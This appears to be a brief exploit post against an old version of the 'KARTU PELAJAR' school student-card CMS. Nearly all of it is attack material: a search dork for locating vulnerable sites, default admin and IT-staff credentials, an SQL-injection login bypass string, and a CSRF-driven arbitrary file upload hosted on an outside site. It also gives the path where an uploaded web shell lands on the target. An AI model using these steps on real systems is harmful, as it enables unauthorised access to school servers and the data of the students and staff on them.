[+] Author : ./meicookies ,developed by Kuroilotuz
[+] Title :vulnerabilities in KARTU PELAJAR cms, Old version
[+] Dork :"Silahkan Login Untuk Akses System." , intitle:KARTU PELAJAR
======================================
[!] Default u/p : admin/admin for admin role and itstaf/itstaf for IT STAF role
[+] Bypass admin Login bug
use: ' or 1=1 limit 1 -- -+
[+] arbitrary file upload with CSRF
[-] Exploit: trget.sch.id/dash_user/aksi/user_update.php
"If the ""Data Berhasil di Ubah"" popup appears it's vulnerable
[-] CSRF : http://kuroilotuz.site/csrf.php
POSTFILE : gambar
[?!] SHELL LOCATION : trget.sch.id/assets/img/user/"your shell.php"
#Make them aware ;)